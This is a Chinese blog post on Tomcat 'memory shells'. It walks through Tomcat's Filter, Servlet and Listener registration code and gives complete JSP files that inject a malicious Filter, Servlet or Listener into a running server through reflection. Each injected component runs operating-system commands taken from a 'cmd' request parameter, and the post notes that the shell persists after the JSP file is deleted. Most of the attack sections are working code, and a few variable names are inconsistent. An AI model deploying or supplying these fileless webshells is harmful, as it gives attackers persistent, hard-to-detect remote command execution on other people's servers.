Tomcat内存马

最新推荐文章于 2024-08-03 17:05:14 发布
最新推荐文章于 2024-08-03 17:05:14 发布
阅读量581 收藏 1
点赞数
分类专栏: Java安全 文章标签: java web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53287512/article/details/129323572
版权

Tomcat内存马

简介

Tomcat内存马主要分为三种,分别是Filter型、Servlet型和Listener型,其原理是动态的将恶意组件添加到正在运行的Tomcat服务器中。

使用范围

Servlet在3.0版本之后能够支持动态注册组件,而Tomcat7.x及以上支持Servlet3.0。

Filter型

源码分析

我们首先来实现一个简单的Filter

import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import java.io.IOException;

@WebFilter("/*")
public class TestFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
    }
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("调用了Filter!");
        filterChain.doFilter(servletRequest,servletResponse);
    }
    @Override
    public void destroy() {
    }
}

使用IDEA进行调试,在doFilter处进行断点,调用链如下:

image-20230301135114764

我们向上回溯,首先看一下ApplicationFilterChain#internalDoFilter

image-20230301135426166

在此处调用了filter.doFilter()方法,此处的filter为我们编写filter对象,该对象通过filterConfig.getFilter()从filterConfig中获取。而filterConfig从ApplicationFilterConfig类型的filters数组中获取。

private ApplicationFilterConfig[] filters = new ApplicationFilterConfig[0];
...
ApplicationFilterConfig filterConfig = this.filters[this.pos++];

每个filterConfig都对应着一个Filter,其中存储这此条Filter的各种信息,例如Filterdef和Filter对象等信息

image-20230301140808072

filterDef中存放了filterClass、filterName等基本信息

image-20230301152131859

我们来找一下存放filterConfig的数组filters[]在哪里被赋值

在StandardWrapperValve#invoke方法中,初始化了一个ApplicationFilterChain

image-20230301141746113

跟进ApplicationFilterFactory#createFilterChain方法,首先会创建一个空的filterChain对象

image-20230301143742309

然后通过wrapper.getParent()函数来获取StandardContext对象,并获取StandardContext对象中的FilterMaps

image-20230301144048337

FilterMaps是存放FilterMap的数组,而FilterMap里主要存储Filter的名称和路径映射信息,其对应的是web.xml中的<filter-mapping>标签

image-20230301144311997

<filter-mapping>
    <filter-name></filter-name>
    <url-pattern></url-pattern>
</filter-mapping>

然后根据Filter的名称,在StandardContext中获取FilterConfig,通过filterChain.addFilter(filterConfig)将所有filterConfig添加到filterChain中

image-20230301144959192

在filterChain.addFilter()方法中,filterConfig被添加至filters[]中,此时就完成了我们前面filters[]的获取问题

image-20230301145555793

接着会回到StandardWrapperValve#invoke方法中,调用filterChain.doFilter方法

image-20230301150630280

在filterChain.doFilter中会调用ApplicationFilterChain#internalDoFilter方法,至此Filter的创建过程清晰明了

image-20230301150654741

从上面的分析可知,filter内存马的关键就是将恶意Filter的信息添加进FilterConfig数组和将恶意的filtermap添加进FilterMaps中,那么Tomcat在启动时就会自动初始化我们的恶意Filter,并在访问相应的路径时触发代码。

动态注册Filter

经过上面的分析,我们可以总结出动态注册Filter的流程:

  1. 获取上下文对象StandardContext
  2. 创建恶意Filter
  3. 构造FilterDef封装filter
  4. 创建filterMap,将路径与Filtername绑定,将其添加到filterMaps中
  5. 使用FilterConfig封装filterDef,然后将其添加到filterConfigs中

我们一步一步完成:

获取StandardContext对象
//获取ApplicationContextFacade类
ServletContext servletContext = request.getSession().getServletContext();
 
//反射获取ApplicationContextFacade类属性context为ApplicationContext类
Field appContextField = servletContext.getClass().getDeclaredField("context");
appContextField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
 
//反射获取ApplicationContext类属性context为StandardContext类
Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
创建恶意Filter
 public class Filter_Shell implements Filter{
        @Override
        public void init(FilterConfig filterConfig) throws ServletException {

        }
        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
            String cmd = servletRequest.getParameter("cmd");
            if(cmd!=null){
                Process process = Runtime.getRuntime().exec(cmd);
                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));
                StringBuilder stringBuilder = new StringBuilder();
                String line;
                while((line = bufferedReader.readLine())!=null){
                    stringBuilder.append(line+"\n");
                }
                servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
                servletResponse.getOutputStream().flush();
                servletResponse.getOutputStream().close();
                return;
            }
            filterChain.doFilter(servletRequest,servletResponse);
        }
        @Override
        public void destroy() {

        }
    }
构造FilterDef封装filter
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filter);
filterDef.setFilterName(name);
filterDef.setFilterClass(filter.getClass().getName());
standardContext.addFilterDef(filterDef);
创建filterMap并放入filterMaps
FilterMap filterMap = new FilterMap();
filterMap.addURLPattern("/*");
filterMap.setFilterName(name);
filterMap.setDispatcher(DispatcherType.REQUEST.name());
standardContext.addFilterMapBefore(filterMap);
封装filterConfig及filterDef到filterConfigs
Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
Configs.setAccessible(true);
Map filterConfigs = (Map) Configs.get(standardContext);
Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
constructor.setAccessible(true);
ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)                constructor.newInstance(standardContext,filterDef);
filterConfigs.put(name, filterConfig);
完整代码
<%--
  Created by IntelliJ IDEA.
  User: Christ1na
  Date: 2023/2/15
  Time: 10:25
  To change this template use File | Settings | File Templates.
--%>
<%@ page import="java.io.IOException" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="java.util.Map" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
    ServletContext servletContext = request.getSession().getServletContext();
    Field appContextField = servletContext.getClass().getDeclaredField("context");
    appContextField.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
    Field standardContextField = applicationContext.getClass().getDeclaredField("context");
    standardContextField.setAccessible(true);
    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
%>

<%!
    public class Filter_Shell implements Filter{
        @Override
        public void init(FilterConfig filterConfig) throws ServletException {

        }
        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
            String cmd = servletRequest.getParameter("cmd");
            if(cmd!=null){
                Process process = Runtime.getRuntime().exec(cmd);
                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));
                StringBuilder stringBuilder = new StringBuilder();
                String line;
                while((line = bufferedReader.readLine())!=null){
                    stringBuilder.append(line+"\n");
                }
                servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
                servletResponse.getOutputStream().flush();
                servletResponse.getOutputStream().close();
                return;
            }
            filterChain.doFilter(servletRequest,servletResponse);
        }
        @Override
        public void destroy() {

        }
    }
%>
<%
    Filter_Shell filter = new Filter_Shell();
    String name = "Christ1na";
    FilterDef filterDef = new FilterDef();
    filterDef.setFilter(filter);
    filterDef.setFilterName(name);
    filterDef.setFilterClass(filter.getClass().getName());
    standardContext.addFilterDef(filterDef);
    FilterMap filterMap = new FilterMap();
    filterMap.addURLPattern("/*");
    filterMap.setFilterName(name);
    filterMap.setDispatcher(DispatcherType.REQUEST.name());
    standardContext.addFilterMapBefore(filterMap);
    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);
    Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
    constructor.setAccessible(true);
    ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
    filterConfigs.put(name, filterConfig);
%>

先访问jsp木马,动态注册恶意Filter

然后访问任意路由即可执行命令,即使删除此jsp文件

image-20230301155718068

Servlet型

源码分析

根据前置知识和Filter型内存马的分析,我们可以知道,要想动态注册Servlet型内存马,我们需要在Tomcat启动的时候进行动态注册,我们来分析一下Tomcat服务器初始化的过程中,是如何加载Servlet的

创建StandardWrapper

首先是获取并解析web.xml获取各种配置参数,然后在configureContext()中调用了createWrapper()创建StandWrapper对象,并根据解析参数初始化StandWrapper对象

image-20230303154336775

继续往下,会配置WrapperServletClass

image-20230303160250139

将配置好的wrapper放入StandardContextChild

image-20230303160411224

通过addServletMappingDecoded()方法添加Servlet对应的url映射

image-20230303154657199

加载StandardWrapper

首先在StandardContext#startInternal方法中获取到StandardWrapper类

然后通过loadOnStartUp()方法加载wrapper

image-20230303161032587

在此方法中,指挥加载所有loadOnStartup属性值大于0的wrapper,其默认为-1,此时selvet加载完毕

动态注册Servlet

经过上面的分析,我们可以总结出动态注册Servlet的流程:

  1. 获取StandardContext对象
  2. 编写恶意Servlet
  3. 通过StandardContext.createWrapper()创建StandardWrapper对象
  4. 设置StandardWrapper对象的各种属性值
  5. 将StandardWrapper对象添加进StandardContext对象的children属性中
  6. 通过StandardContext.addServletMappingDecoded()添加对应的路径映射
获取StandardContext对象
<%    ServletContext servletContext = request.getSession().getServletContext();
    Field field = servletContext.getClass().getDeclaredField("context");
    field.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext)field.get(servletContext);
    Field field1 = applicationContext.getClass().getDeclaredField("context");
    field1.setAccessible(true);
    StandardContext standardContext = (StandardContext)field1.get(applicationContext);
%>
或者
<%    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext stdcontext = (StandardContext) req.getContext();
%>
编写恶意Servlet
public class Servlet_Shell implements Servlet {
        @Override
        public void init(ServletConfig config) throws ServletException {
        }
        @Override
        public ServletConfig getServletConfig() {
            return null;
        }
        @Override
        public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
            String cmd = req.getParameter("cmd");
            if (cmd !=null){
                try{
                    Runtime.getRuntime().exec(cmd);
                }catch (IOException e){
                    e.printStackTrace();
                }catch (NullPointerException n){
                    n.printStackTrace();
                }
            }
        }
        @Override
        public String getServletInfo() {
            return null;
        }
        @Override
        public void destroy() {
        }
    }
创建StandardWrapper对象
<%
    Servlet_Shell Servlet_Shell = new Servlet_Shell();
    String name = Servlet_Shell.getClass().getSimpleName();
    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setLoadOnStartup(1);
    wrapper.setName(name);
    wrapper.setServlet(shell_servlet);
    wrapper.setServletClass(shell_servlet.getClass().getName());
%>
将Wrapper添加进StandardContext
<%
	standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/shell",name);
%>
完整代码
<%--
  Created by IntelliJ IDEA.
  User: Christ1na
  Date: 2023/3/3
  Time: 16:19
  To change this template use File | Settings | File Templates.
--%>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext standardContext = (StandardContext) req.getContext();
%>

<%!

    public class Servlet_Shell implements Servlet {
        @Override
        public void init(ServletConfig config) throws ServletException {
        }
        @Override
        public ServletConfig getServletConfig() {
            return null;
        }
        @Override
        public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
            String cmd = req.getParameter("cmd");
            if (cmd !=null){
                try{
                    Runtime.getRuntime().exec(cmd);
                }catch (IOException e){
                    e.printStackTrace();
                }catch (NullPointerException n){
                    n.printStackTrace();
                }
            }
        }
        @Override
        public String getServletInfo() {
            return null;
        }
        @Override
        public void destroy() {
        }
    }

%>

<%
    Servlet_Shell Servlet_Shell = new Servlet_Shell();
    String name = Servlet_Shell.getClass().getSimpleName();

    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setLoadOnStartup(1);
    wrapper.setName(name);
    wrapper.setServlet(Servlet_Shell);
    wrapper.setServletClass(Servlet_Shell.getClass().getName());
%>

<%
    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/shell",name);
%>

先访问jsp文件,然后成功注册内存马

image-20230303162637005

Listener型

Listener分为三种:

  • ServletContextListener
  • HttpSessionListener
  • ServletRequestListener

显然最适合做内存马的是ServletRequestListener,其用来监听ServletRequest对象的,当我们访问任意资源时都会触发

源码分析

我们首先来实现一个简单的ServletRequestListener

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;
import javax.servlet.annotation.WebListener;

@WebListener
public class TestListener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
        System.out.println("destroyde TestListener");
    }

    @Override
    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
        System.out.println("initializde TestListener");
    }
}

在requestDestroyed方法打上断点进行调试,可以发现是StandardContext#fireRequestDestroyEvent()中调用了requestDestroyed(),而我们的listener对象是由getApplicationEventListeners()进行获取

image-20230303163553395

跟进此方法,发现Listener是存储于applicationEventListenersList属性中image-20230303163921924

image-20230303163855416

我们可以通过StandardContext#addApplicationEventListener()来添加Listener

image-20230303164253626

动态注册Listener

经过上面的分析,我们可以总结出动态注册Listener的流程:

  1. 获取上下文对象StandardContext
  2. 创建恶意Listener
  3. 使用addApplicationEventListener()方法添加恶意的Listener
获取StandardContext
<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();
%>
或者
<%
	WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
    StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
%>
创建恶意Listener
<%!
    public class Listener_Shell implements ServletRequestListener {

        public void requestInitialized(ServletRequestEvent sre) {
            HttpServletRequest request = (HttpServletRequest) sre.getServletRequest();
            String cmd = request.getParameter("cmd");
            if (cmd != null) {
                try {
                    Runtime.getRuntime().exec(cmd);
                } catch (IOException e) {
                    e.printStackTrace();
                } catch (NullPointerException n) {
                    n.printStackTrace();
                }
            }
        }

        public void requestDestroyed(ServletRequestEvent sre) {
        }
    }
%>
添加恶意的Listener
<%
	Shell_Listener shell_Listener = new Shell_Listener();
    context.addApplicationEventListener(shell_Listener);
%>
完整代码
<%--
  Created by IntelliJ IDEA.
  User: Christ1na
  Date: 2023/3/3
  Time: 16:49
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.connector.Request" %>

<%!
    public class Listener_Shell implements ServletRequestListener {

        public void requestInitialized(ServletRequestEvent sre) {
            HttpServletRequest request = (HttpServletRequest) sre.getServletRequest();
            String cmd = request.getParameter("cmd");
            if (cmd != null) {
                try {
                    Runtime.getRuntime().exec(cmd);
                } catch (IOException e) {
                    e.printStackTrace();
                } catch (NullPointerException n) {
                    n.printStackTrace();
                }
            }
        }

        public void requestDestroyed(ServletRequestEvent sre) {
        }
    }
%>
<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();

    Listener_Shell Listener_Shell = new Listener_Shell();
    context.addApplicationEventListener(Listener_Shell);
%>

访问此恶意jsp后成功注册内存马

image-20230303165239427

参考链接:

https://goodapple.top/archives/1355#leftbar_tab_catalog

http://blog.o3ev.cn/yy/1509

Christ1na
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 581
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
tomcat内存学习
yggcwhat
05-14 320
tomcat内存学习
tomcat内存配置及配置参数详解
Xin_shou__的博客
05-06 1576
在基准测试的时候,为保证最好的性能,要把堆的大小设大,保证垃圾收集不在整个基准测试的过程中出现。如果 JVM 的堆大小大于 1GB,则应该使用值:-XX:newSize=640m -XX:MaxNewSize=640m -XX:SurvivorRatio=16,或者将堆的总大小的 50% 到 60% 分配给新生成的池。2)-Xmx的值和-XX:MaxPermSize的总和超过了JVM内存的最大限制,比如当前操作系统最大内存限制,或者实际的物理内存等等。而后者是eclipse所使用的JVM中的参数。
shiro 内存_Tomcat 内存检测
weixin_39637921的博客
12-22 1467
随着HW、攻防对抗的强度越来越高,各大厂商对于webshell的检测技术愈发成熟,对于攻击方来说,传统的文件落地webshell的生存空间越来越小,无文件webshell已经逐步成为新的研究趋势。三月底针对tomcat内存的检测写了一个demo,但由于对Maven打包理解不深,整个项目结构比较糟糕。国庆前偶然发现LandGrey师傅的copagent项目,在该项目基础上进行了重构,并于本文中记录...
java tomcat内存学习
springgold的博客
01-21 755
1.tomcat 1.tomcat 结构 --Server 顶层容器--Service 提供具体服务的--Connector--Container--Engine--Host--Context--Wrapper--Service Server: 一个Tomcat仅有一个Server,指代整个Web服务器。Connect...
结合反序列化注入tomcat内存
白帽子凯哥哥的博客
05-24 1034
通过前几个内存的学习我们可以知道,将内存写在jsp文件上传并不是传统意义上的内存注入,jsp文件本质上就是一个servlet,servlet会编译成class文件,也会实现文件落地。借用木头师傅的一张图结合反序列化注入内存是动态注入内存的常用方法,然而通过反序列化注入的方式没有jsp文件的request内置类,所以获取回显的方式我们也需要考虑,在此写下这篇文章分析总结反序列化注入的方法细节。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
Tomcat内存学习2:Servlet型
weixin_43263451的博客
07-23 599
上一篇讲了filter型内存,而这次这个servlet型内存也是大同小异,就是在内存中恶意创建一个servlet供攻击者使用必须搞懂servlet的加载机制(创建standwrapper,添加到standcontext中,加载standwrapper)在此加载机制基础上,设计出servlet内存poc。...
Tomcat内存学习4:结合反序列化注入
weixin_43263451的博客
07-31 717
之前我们都是通过jsp来动态注册内存,虽然说没有对应的filter或者servlet的class文件,但是在Web服务器中的jsp编译器会编译生成对应的java文件然后进行编译加载并实例化,所以实际上还是会落地的,如下图这里借用木头师傅的一张图所以本文的目的是通过反序列化来实现真正意义上的无文件落地内存注入本文首先需要搞清楚为何需要反序列化注入内存为了首先真正意义无文件落地其次要搞清楚为何要获取request对象以及如何获得剩下就是利用反序列化执行动态注册代码。......
Javaweb安全——Tomcat 内存基础
weixin_43610673的博客
08-17 1393
无文件落地的 webshell 技术,即,通常配合反序列化或者spel表达式注入进行类加载写入。本文环境 Tomcat 9.0.59 作为中间件,且并没有配置spring框架,代码具体实现与中间件有关。
深入研究Tomcat内存的攻击技术
hackzkaq的博客
11-16 250
Tomcat内存Tomcat Memory Shell)是一种利用Apache Tomcat服务器的漏洞,将恶意代码注入Tomcat进程的内存中的攻击技术ServletContextListener:用于监听整个 Servlet 上下文(创建、销毁)ServletContextAttributeListener:对 Servlet 上下文属性进行监听(增删改属性)ServletRequestListener:对 Request 请求进行监听(创建、销毁)
S06-tomcat之servlet内存1
08-03
"S06-tomcat之servlet内存1" 在 Tomcat 中,Servlet 内存是一种特殊的 Servlet,它可以动态注册 Tomcat 组件,实现内存攻击。下面将对 Servlet 内存的工作原理和实现机制进行详细的分析和解释。 Servlet ...
memshell:Tomcat 冰蝎内存
04-13
Tomcat 无文件冰蝎内存使用以下命令创建tomcat容器,并将inject.jar,agent.jar复制到容器中。docker run -d -ti --net host --name tomcat tomcat:8.0.18-jre8docker cp inject.jar tomcat:/usr/local/tomcat...
S04-tomcat之Filter内存1
08-03
【标题】:"S04-tomcat之Filter内存1" 【描述】:"理解Tomcat中的Filter内存,涉及servlet-api以及Tomcat组件动态注册的实现,关注Filter的生命周期和内存的创建思路。" 在Java Web开发中,Tomcat作为常用的...
S07-tomcat之Listener内存1
08-03
它们在容器级别运行,早于Servlet的创建和请求的处理,因此不适合用来创建内存,因为此时还没有可用的Servlet实例或请求对象。 2. `java.util.EventListener`:这是Java标准库中的接口,被许多其他接口(如`...
Tomcat Filter类型内存与查杀技术学习1
08-03
【技术干货】Tomcat Filter类型内存与查杀技术学习 随着网络安全的不断提升,传统的木Webshell在防御机制下越来越难以生存。在这种背景下,内存应运而生,它无需在磁盘上留下文件痕迹,而是将恶意代码直接...
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 633
1.导入hutool的maven依赖。2.复制一下代码执行。
SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档
最新发布
m0_74283290的博客
08-03 673
本论文阐述了一套先进的图书管理系统的设计与实现,该系统采用Java语言,结合现代Web开发框架和技术,旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心,整合MyBatis ORM工具,以及MySQL数据库,构建了一个高性能、可扩展的后端服务。前端界面则采用了Vue.js框架,以提供流畅的用户交互体验。论文首先进行了详尽的需求分析,确定了系统的核心功能,包括图书的添加、编辑、删除、查询,读者的注册、登录、个人信息管理,以及图书的借阅、归还、续借流程。
社区养老服务小程序的设计
Karen198的博客
07-31 559
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
tomcat 内存溢出
06-10
Tomcat内存溢出是指Tomcat运行时的JVM内存不足,导致应用程序无法正常运行,甚至导致Tomcat崩溃。为了解决Tomcat内存溢出问题,可以采取以下措施: 1. 调整JVM内存参数:可以通过修改Tomcat的启动脚本或Catalina.sh文件来调整JVM内存参数,例如-Xms和-Xmx等参数。适当增大JVM内存可以缓解内存溢出问题,但也需要考虑到服务器硬件资源的限制。 2. 检查应用程序:可以检查应用程序的代码和配置文件,查找可能存在的内存泄漏和无效代码等问题。可以使用工具如VisualVM等来分析应用程序的内存使用情况。 3. 优化Tomcat配置:可以优化Tomcat的配置参数,例如调整线程数、缓存大小等,以提高应用程序的性能和稳定性。可以根据应用程序的大小和特点,适当调整Tomcat的配置参数。 4. 升级Tomcat版本:可以考虑升级到最新版本的Tomcat,以获得更好的性能和稳定性。新版本的Tomcat通常会修复一些已知的内存溢出问题。 总之,Tomcat内存溢出是一个常见的问题,可以采取以上措施来解决。需要注意的是,内存调优需要根据具体情况进行,不能盲目增加内存。同时,应该定期检查应用程序和Tomcat的配置,及时发现和解决问题,以保证应用程序的稳定性和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值